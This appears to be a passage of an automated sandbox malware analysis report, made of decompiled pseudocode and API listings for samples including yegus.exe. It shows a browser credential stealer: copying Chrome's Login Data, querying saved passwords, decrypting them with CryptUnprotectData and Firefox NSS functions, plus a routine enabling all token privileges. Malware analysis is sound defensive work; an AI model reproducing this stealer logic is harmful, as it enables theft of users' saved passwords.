							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00D72793(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E00D72122())) = 0x16;
					return E00D70269() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























    0x00d6e495
    0x00d6e49e
    0x00d6e4a3
    0x00d6e4a6
    0x00d6e4aa
    0x00d6e4b9
    0x00d6e4bc
    0x00d6e4dc
    0x00d6e4e1
    0x00d6e4e4
    0x00d6e4e6
    0x00d6e5b4
    0x00d6e5ba
    0x00d6e5cf
    0x00d6e5db
    0x00d6e5e1
    0x00d6e5e3
    0x00d6e5f2
    0x00d6e5f2
    0x00d6e5f2
    0x00d6e5f5
    0x00d6e5f5
    0x00d6e5f9
    0x00d6e5fb
    0x00d6e5fe
    0x00d6e5fe
    0x00d6e5fe
    0x00d6e5fe
    0x00000000
    0x00d6e605
    0x00d6e5ea
    0x00000000
    0x00d6e5ea
    0x00d6e5bc
    0x00d6e5bf
    0x00d6e5bf
    0x00d6e5c2
    0x00d6e5c2
    0x00d6e5c4
    0x00d6e5c5
    0x00d6e5c5
    0x00d6e5c9
    0x00000000
    0x00d6e5c9
    0x00d6e4ec
    0x00d6e4f2
    0x00d6e51f
    0x00d6e52b
    0x00d6e531
    0x00d6e533
    0x00000000
    0x00000000
    0x00d6e539
    0x00d6e53f
    0x00d6e542
    0x00d6e59e
    0x00d6e5a3
    0x00d6e5ab
    0x00000000
    0x00d6e5ab
    0x00d6e544
    0x00d6e547
    0x00d6e549
    0x00d6e54c
    0x00d6e54e
    0x00d6e550
    0x00d6e586
    0x00d6e594
    0x00d6e59a
    0x00d6e59c
    0x00d6e5b0
    0x00000000
    0x00d6e5b0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d6e552
    0x00d6e552
    0x00d6e552
    0x00d6e555
    0x00d6e558
    0x00d6e55a
    0x00000000
    0x00000000
    0x00d6e564
    0x00d6e56b
    0x00d6e56e
    0x00d6e570
    0x00d6e578
    0x00d6e578
    0x00d6e57b
    0x00d6e57c
    0x00d6e57f
    0x00d6e581
    0x00000000
    0x00000000
    0x00000000
    0x00d6e581
    0x00d6e572
    0x00d6e573
    0x00d6e576
    0x00000000
    0x00000000
    0x00000000
    0x00d6e576
    0x00d6e583
    0x00000000
    0x00d6e583
    0x00d6e4f4
    0x00d6e4f6
    0x00000000
    0x00000000
    0x00d6e4fc
    0x00d6e4ff
    0x00d6e503
    0x00d6e506
    0x00d6e50a
    0x00000000
    0x00000000
    0x00d6e510
    0x00d6e511
    0x00d6e514
    0x00d6e516
    0x00000000
    0x00000000
    0x00000000
    0x00d6e518
    0x00000000
    0x00d6e4ff
    0x00d6e4c3
    0x00000000
    0x00d6e4ce
    0x00d6e4b0
    0x00d6e4b6
    0x00000000
    0x00d6e4b6
    0x00d6e60d

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000009,00000800,00000000,?,00000000,?,?,?,?,000003FF,?,00000000,00000800), ref: 00D6E52B
    • GetLastError.KERNEL32(?,?,?,000003FF,?,00000000,00000800), ref: 00D6E539
    • MultiByteToWideChar.KERNEL32(?,00000001,00000800,00000800,?,00000000,?,?,?,000003FF,?,00000000,00000800), ref: 00D6E594
    • MultiByteToWideChar.KERNEL32(?,00000009,00000800,00000000,00000000,00000000,?,?,?,?,000003FF,?,00000000,00000800), ref: 00D6E5DB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D72BDD, Relevance: 5.1, APIs: 4, Instructions: 80
    C-Code - Quality: 90%
    			E00D72BDD(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E00D74D4E(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E00D717FF(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E00D720EC(GetLastError());
								}
							}
							E00D717C5(_t40);
							_t14 = _t35;
						} else {
							E00D720EC(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E00D72122())) = 0x16;
						E00D70269();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E00D72122())) = 0x16;
				E00D70269();
				return 0;
			}
















    0x00d72be2
    0x00d72be7
    0x00d72c01
    0x00d72c04
    0x00d72c06
    0x00d72c1f
    0x00d72c21
    0x00d72c28
    0x00d72c2a
    0x00d72c33
    0x00d72c34
    0x00d72c38
    0x00d72c3e
    0x00d72c41
    0x00d72c43
    0x00d72c5d
    0x00d72c60
    0x00d72c62
    0x00d72c6f
    0x00d72c75
    0x00d72c77
    0x00d72c8b
    0x00d72c8d
    0x00d72c91
    0x00d72c91
    0x00d72c92
    0x00d72c79
    0x00d72c80
    0x00d72c85
    0x00d72c77
    0x00d72c95
    0x00d72c9a
    0x00d72c45
    0x00d72c4c
    0x00d72c51
    0x00d72c51
    0x00d72c08
    0x00d72c0d
    0x00d72c13
    0x00d72c18
    0x00d72c18
    0x00000000
    0x00d72c9f
    0x00d72bee
    0x00d72bf4
    0x00000000

    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,00D6E755,00000000,00000000,?), ref: 00D72C38
    • GetLastError.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,?,?,?,?,00D6E755,00000000,00000000,?), ref: 00D72C45
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    • MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,?), ref: 00D72C6F
    • GetLastError.KERNEL32(?,00000000,00000000,000000FF,00000000,00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,?), ref: 00D72C79
      • Part of subcall function 00D717C5: HeapFree.KERNEL32(00000000,00000000), ref: 00D717DB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Analysis Process: yegus.exe PID: 3232 Parent PID: 3216

    Executed Functions

    Function 10001D60, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 169encryption

    Control-flow Graph

    APIs
    • GetFileAttributesA.KERNELBASE ref: 10001D8C
    • GetTempPathA.KERNEL32(00000105,?), ref: 10001DD3
    • GetTempFileNameA.KERNEL32(?,chr,00000000,?), ref: 10001DED
    • CopyFileA.KERNEL32(?,?,00000000), ref: 10001DFB
    • CryptUnprotectData.CRYPT32(?), ref: 10001F00
    • HeapAlloc.KERNEL32(00000008,-00000064), ref: 10001F1E
    • LocalFree.KERNEL32(?,00000000,?,00000000), ref: 10001F38
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000,?), ref: 10001F5E
    • DeleteFileA.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 10001F79
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    • chr, xrefs: 10001DE0
    • SELECT origin_url, username_value, password_value FROM logins;, xrefs: 10001E29
    • O~Du, xrefs: 10001F00
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 013338C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142file

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 217 13338c0-13338e7 GetCommandLineW 218 13338ed-13338fe CommandLineToArgvW 217->218 219 1333a97-1333aad call 1333e82 217->219 218->219 221 1333904-1333937 call 13334e0 218->221 221->219 225 133393d-1333961 221->225 226 1333966-1333977 225->226 226->226 227 1333979-13339a9 call 1333790 226->227 227->219 230 13339af-13339c0 call 1333570 227->230 230->219 233 13339c6-13339df call 1331fb0 230->233 233->219 236 13339e5-13339f0 call 13335b0 233->236 236->219 239 13339f6-1333a12 call 13335e0 call 1333ab0 236->239 239->219 244 1333a18-1333a40 CreateFileW 239->244 245 1333a42-1333a45 244->245 246 1333a81-1333a94 call 1333e82 244->246 245->246 247 1333a47-1333a4c 245->247 249 1333a50-1333a59 247->249 249->249 251 1333a5b-1333a7b WriteFile CloseHandle 249->251 251->246
    C-Code - Quality: 71%
    			E013338C0() {
				signed int _v8;
				signed int _v16;
				char _v17;
				short _v19;
				struct _OVERLAPPED* _v23;
				char _v48;
				char _v49;
				short _v51;
				struct _OVERLAPPED* _v55;
				char _v64;
				int _v68;
				struct _OVERLAPPED* _v72;
				intOrPtr _v76;
				struct _OVERLAPPED* _v80;
				long _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				short* _t43;
				PWCHAR* _t46;
				void* _t52;
				void* _t55;
				void* _t58;
				void* _t60;
				void _t63;
				void* _t69;
				WCHAR* _t70;
				void* _t71;
				signed int _t76;
				void* _t83;
				void* _t90;
				void* _t91;
				void* _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t99;
				void* _t100;
				signed int _t101;
				signed int _t103;

				_t103 = (_t101 & 0xfffffff8) - 0x4c;
				_t41 =  *0x1347004; // 0x262637d3
				_v8 = _t41 ^ _t103;
				_push(_t91);
				_v68 = 0;
				_t43 = GetCommandLineW();
				if(_t43 == 0) {
					L16:
					_pop(_t92);
					_pop(_t97);
					_pop(_t69);
					return E01333E82(_t69, _v8 ^ _t103, _t92, _t97);
				} else {
					_t46 = CommandLineToArgvW(_t43,  &_v68);
					if(_v76 < 3) {
						goto L16;
					} else {
						_t70 = _t46[2];
						asm("xorps xmm0, xmm0");
						_v64 = 0;
						asm("movq [esp+0x25], xmm0");
						_v55 = 0;
						_v51 = 0;
						_v49 = 0;
						if(E013334E0(_t46[1],  &_v64) == 0) {
							goto L16;
						} else {
							asm("xorps xmm0, xmm0");
							_v48 = 0;
							asm("movups [esp+0x35], xmm0");
							_t76 = 0;
							_v23 = 0;
							asm("movq [esp+0x45], xmm0");
							_v19 = 0;
							_v17 = 0;
							do {
								 *((char*)(_t103 + _t76 + 0x34)) =  *((intOrPtr*)(_t103 + (_t76 & 0x0000000f) + 0x24));
								_t76 = _t76 + 1;
							} while (_t76 < 0x20);
							_push(_t76);
							_v84 = 0;
							_v80 = 0;
							_v72 = 0;
							_v68 = 0;
							_t52 = E01333790(_t76,  &_v84); // executed
							_t103 = _t103 + 8;
							if(_t52 == 0) {
								goto L16;
							} else {
								_t98 = _v80;
								_t77 = _v80;
								if(E01333570(_v80,  &_v72) == 0) {
									goto L16;
								} else {
									_t55 = E01331FB0( &_v84,  &_v72, _t91, _t98, _t98, _t77,  &_v48);
									_t103 = _t103 + 0xc;
									if(_t55 == 0 || E013335B0( &_v72) == 0) {
										goto L16;
									} else {
										E013335E0(); // executed
										_v84 = 0;
										_t58 = E01333AB0( &_v84,  &_v72); // executed
										if(_t58 == 0) {
											goto L16;
										} else {
											_t94 =  !=  ? _v84 : L"<NULL>"; // executed
											_t60 = CreateFileW(_t70, 0x40000000, 2, 0, 3, 0, 0); // executed
											_t99 = _t60;
											if(_t99 != 0 && _t99 != 0xffffffff) {
												_t83 = _t94;
												_t90 = _t83 + 2;
												do {
													_t63 =  *_t83;
													_t83 = _t83 + 2;
												} while (_t63 != 0);
												_v84 = 0;
												WriteFile(_t99, _t94, (_t83 - _t90 >> 1) + (_t83 - _t90 >> 1),  &_v84, 0); // executed
												CloseHandle(_t99);
											}
											_pop(_t95);
											_pop(_t100);
											_pop(_t71);
											return E01333E82(_t71, _v16 ^ _t103, _t95, _t100);
										}
									}
								}
							}
						}
					}
				}
			}












































    0x013338c6
    0x013338c9
    0x013338d0
    0x013338d6
    0x013338d7
    0x013338df
    0x013338e7
    0x01333a97
    0x01333aa0
    0x01333aa1
    0x01333aa2
    0x01333aad
    0x013338ed
    0x013338f3
    0x013338fe
    0x00000000
    0x01333904
    0x0133390b
    0x0133390e
    0x01333911
    0x01333916
    0x0133391c
    0x01333924
    0x0133392b
    0x01333937
    0x00000000
    0x0133393d
    0x0133393d
    0x01333940
    0x01333945
    0x0133394a
    0x0133394c
    0x01333954
    0x0133395a
    0x01333961
    0x01333966
    0x0133396f
    0x01333973
    0x01333974
    0x01333979
    0x0133397e
    0x01333987
    0x0133398f
    0x01333997
    0x0133399f
    0x013339a4
    0x013339a9
    0x00000000
    0x013339af
    0x013339af
    0x013339b7
    0x013339c0
    0x00000000
    0x013339c6
    0x013339d5
    0x013339da
    0x013339df
    0x00000000
    0x013339f6
    0x013339f6
    0x013339ff
    0x01333a0b
    0x01333a12
    0x00000000
    0x01333a18
    0x01333a33
    0x01333a36
    0x01333a3c
    0x01333a40
    0x01333a47
    0x01333a49
    0x01333a50
    0x01333a50
    0x01333a53
    0x01333a56
    0x01333a5d
    0x01333a74
    0x01333a7b
    0x01333a7b
    0x01333a83
    0x01333a84
    0x01333a85
    0x01333a94
    0x01333a94
    0x01333a12
    0x013339df
    0x013339c0
    0x013339a9
    0x01333937
    0x013338fe

    APIs
    • GetCommandLineW.KERNEL32 ref: 013338DF
    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 013338F3
      • Part of subcall function 01333790: GetModuleHandleW.KERNEL32(00000000), ref: 013337B0
      • Part of subcall function 01333790: FindResourceW.KERNEL32(00000000,00000065,BMP), ref: 013337CB
      • Part of subcall function 01333790: LoadResource.KERNEL32(00000000,00000000), ref: 013337D9
      • Part of subcall function 01333790: LockResource.KERNEL32(00000000), ref: 013337E4
      • Part of subcall function 01333790: SizeofResource.KERNEL32(00000000,00000000), ref: 013337F3
      • Part of subcall function 01333570: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,01333808), ref: 01333581
      • Part of subcall function 01333570: RtlAllocateHeap.NTDLL(00000000), ref: 01333588
      • Part of subcall function 013335E0: GetCurrentProcess.KERNEL32(000F01FF,?), ref: 0133360E
      • Part of subcall function 013335E0: OpenProcessToken.ADVAPI32(00000000), ref: 01333615
      • Part of subcall function 013335E0: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 0133364F
      • Part of subcall function 013335E0: GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,?,?), ref: 01333687
      • Part of subcall function 013335E0: LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 013336D1
      • Part of subcall function 013335E0: AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 01333748
      • Part of subcall function 013335E0: CloseHandle.KERNEL32(FFFFFFFF), ref: 01333774
    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 01333A36
    • WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 01333A74
    • CloseHandle.KERNEL32(00000000), ref: 01333A7B
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 013335E0, Relevance: 10.6, APIs: 7, Instructions: 120

    Control-flow Graph

    C-Code - Quality: 74%
    			E013335E0() {
				signed int _v8;
				short _v532;
				int _v536;
				struct _TOKEN_PRIVILEGES _v548;
				void* _v552;
				long _v556;
				long _v560;
				long _v568;
				long _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t34;
				int _t40;
				int _t46;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t59;
				void* _t60;
				struct _LUID* _t62;
				signed int _t63;
				void* _t64;
				void* _t65;

				_t28 =  *0x1347004; // 0x262637d3
				_v8 = _t28 ^ _t63;
				_v552 = 0xffffffff;
				_t61 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 0xf01ff,  &_v552) != 0) {
					_t60 = GetTokenInformation;
					_v556 = 0;
					_t34 = GetTokenInformation(_v552, 3, 0, 0,  &_v556); // executed
					if(_t34 == 0) {
						_push(_v556);
						_t52 = E01336EBC(_t53);
						_t65 = _t64 + 4;
						if(_t52 != 0) {
							_t40 = GetTokenInformation(_v552, 3, _t52, _v556,  &_v556); // executed
							if(_t40 != 0) {
								_t60 = 0;
								if( *_t52 > 0) {
									_t12 = _t52 + 4; // 0x4
									_t62 = _t12;
									do {
										E01336200(_t60,  &_v532, 0, 0x208);
										_t65 = _t65 + 0xc;
										_v560 = 0x104;
										_t46 = LookupPrivilegeNameW(0, _t62,  &_v532,  &_v560); // executed
										if(_t46 != 0 &&  *((intOrPtr*)(_t62 + 8)) == 0) {
											asm("xorps xmm0, xmm0");
											_v572 = _t62->LowPart;
											asm("movq [ebp-0x234], xmm0");
											_v568 = _t62->HighPart;
											asm("movq [ebp-0x21c], xmm0");
											asm("movq xmm0, [ebp-0x238]");
											_v536 = 0;
											_v548.PrivilegeCount = 1;
											asm("movq [ebp-0x21c], xmm0");
											_v536 = 2;
											AdjustTokenPrivileges(_v552, 0,  &_v548, 0x10, 0, 0);
										}
										_t60 = _t60 + 1;
										_t62 = _t62 + 0xc;
									} while (_t60 <  *_t52);
								}
								_t61 = 1;
							}
							E01336EB7(_t52);
						}
					}
					_t54 = _v552;
					if(_t54 != 0xffffffff) {
						CloseHandle(_t54);
					}
					return E01333E82(_t52, _v8 ^ _t63, _t60, _t61);
				} else {
					return E01333E82(_t52, _v8 ^ _t63, _t59, 0);
				}
			}




























    0x013335e9
    0x013335f0
    0x013335fc
    0x0133360c
    0x0133361d
    0x01333630
    0x01333649
    0x0133364f
    0x01333653
    0x01333659
    0x01333664
    0x01333666
    0x0133366b
    0x01333687
    0x0133368b
    0x01333691
    0x01333695
    0x0133369b
    0x0133369b
    0x013336a0
    0x013336ae
    0x013336b3
    0x013336b6
    0x013336d1
    0x013336d9
    0x013336e3
    0x013336e8
    0x013336f3
    0x013336fb
    0x0133370a
    0x01333712
    0x01333722
    0x0133372c
    0x01333736
    0x0133373e
    0x01333748
    0x01333748
    0x0133374e
    0x0133374f
    0x01333752
    0x013336a0
    0x0133375a
    0x0133375a
    0x01333760
    0x01333765
    0x0133366b
    0x01333768
    0x01333771
    0x01333774
    0x01333774
    0x0133378c
    0x01333622
    0x0133362f
    0x0133362f

    APIs
    • GetCurrentProcess.KERNEL32(000F01FF,?), ref: 0133360E
    • OpenProcessToken.ADVAPI32(00000000), ref: 01333615
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 0133364F
    • GetTokenInformation.KERNELBASE(FFFFFFFF,00000003(TokenIntegrityLevel),00000000,?,?), ref: 01333687
    • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,00000104), ref: 013336D1
    • AdjustTokenPrivileges.ADVAPI32(FFFFFFFF,00000000,?,00000010,00000000,00000000), ref: 01333748
    • CloseHandle.KERNEL32(FFFFFFFF), ref: 01333774
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10064140, Relevance: 9.6, Strings: 7, Instructions: 826
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 10001FB0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45string
    APIs
    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 10001FEC
    • lstrlenA.KERNEL32(?), ref: 10001FF9
    • lstrlenA.KERNEL32(\Google\Chrome\User Data\Default\Login Data), ref: 1000200C
      • Part of subcall function 10001D60: GetFileAttributesA.KERNELBASE ref: 10001D8C
      • Part of subcall function 10001D60: GetTempPathA.KERNEL32(00000105,?), ref: 10001DD3
      • Part of subcall function 10001D60: GetTempFileNameA.KERNEL32(?,chr,00000000,?), ref: 10001DED
      • Part of subcall function 10001D60: CopyFileA.KERNEL32(?,?,00000000), ref: 10001DFB
      • Part of subcall function 10001D60: CryptUnprotectData.CRYPT32(?), ref: 10001F00
      • Part of subcall function 10001D60: HeapAlloc.KERNEL32(00000008,-00000064), ref: 10001F1E
      • Part of subcall function 10001D60: LocalFree.KERNEL32(?,00000000,?,00000000), ref: 10001F38
      • Part of subcall function 10001D60: HeapFree.KERNEL32(00000000,00000000,?), ref: 10001F5E
      • Part of subcall function 10001D60: DeleteFileA.KERNELBASE(?,?,?,?,?,?,?,?,00000000), ref: 10001F79
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100196A0, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 604
    APIs
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
      • Part of subcall function 10011D60: __alldiv.INT64 ref: 10011E60
    • __alldiv.INT64 ref: 10019D6E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1000D3F0, Relevance: 1.5, APIs: 1, Instructions: 21
    APIs
    • GetSystemInfo.KERNELBASE(100A23D4,100042AC,?,?,1007DF41,?,?,?,?,?,?,100017B0,00000006,00000000,?,00000000), ref: 1000D410
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 013347F1, Relevance: 1.5, APIs: 1, Instructions: 3
    C-Code - Quality: 100%
    			E013347F1() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E013347FD); // executed
				return _t1;
			}




    0x013347f6
    0x013347fc

    APIs
    • SetUnhandledExceptionFilter.KERNEL32(Function_000047FD), ref: 013347F6
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100015B0, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 57library

    Control-flow Graph

    APIs
    • LoadLibraryA.KERNEL32(nss3.dll), ref: 100015B6
    • GetProcAddress.KERNEL32(00000000,NSS_Init,?), ref: 100015D3
    • GetProcAddress.KERNEL32(00000000,NSSBase64_DecodeBuffer), ref: 100015E0
    • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 100015ED
    • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 100015FA
    • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 10001607
    • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 10001614
    • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 10001621
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 100823B0, Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 152registrystring

    Control-flow Graph

    APIs
